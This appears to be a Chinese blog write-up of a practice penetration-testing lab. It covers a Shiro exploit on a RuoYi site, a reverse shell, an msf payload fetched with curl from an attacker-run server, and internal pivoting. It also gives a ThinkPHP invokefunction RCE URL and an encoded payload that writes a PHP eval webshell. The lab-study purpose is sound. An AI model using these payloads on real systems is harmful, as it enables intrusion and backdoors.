外网靶场2
信息收集
cms
发现是若依
web 渗透
根据信息收集获取的数据,直接使用shiro 尝试
利群利用
发现存在直接反弹shell
上线msf
生成payload
开启http服务
使用curl
1
curl http://ip:8000/file -O
执行
上线成功
内网信息收集
网段信息收集
fscan 一下
内网横向移动
搭建代理
成功
172.16.60.133
发现目标
开启浏览器代理
访问public
rce
1
/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
写webshell
1
http://172.16.60.133/thinkphp/public/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%65%63%68%6f%20%22%3c%3f%70%68%70%20%40%65%76%61%6c%28%5c%24%5f%50%4f%53%54%5b%63%63%63%5d%29%3b%3f%3e%22%20%3e%61%75%67%75%73%74%2e%70%68%70
忘记了是一个windwos 的机器
可以直接使用hta_server 尝试
还可以尝试使用powershell
外网靶场2
https://tsy244.github.io/2024/03/19/靶场记录/外网靶场2/